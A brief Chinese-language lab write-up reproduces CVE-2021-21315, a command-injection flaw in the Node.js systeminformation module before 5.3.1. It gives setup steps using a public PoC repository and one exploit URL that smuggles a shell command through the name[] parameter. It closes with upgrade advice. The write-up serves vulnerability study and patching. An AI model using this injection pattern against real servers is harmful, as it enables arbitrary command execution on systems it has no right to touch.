简介

 

Node.js-systeminformation是用于获取各种系统信息的Node.JS模块，它包含多种轻量级功能，可以检索详细的硬件和系统相关信息。

 

影响版本

 

Systeminformation < 5.3.1

 

环境搭建

 

这里用node10.16.0进行测试

源码下载

git clone https://github/ForbiddenProgrammer/CVE-2021-21315-PoC.git

 nodejs开启http 

node index.js

 

漏洞复现

 

http://192.168.204.131:8000/api/getServices?name[]=$(echo 'testtest' > test.txt)

 

修复建议

 

升级到安全版本

下载链接：

https://www.npmjs/package/systeminformation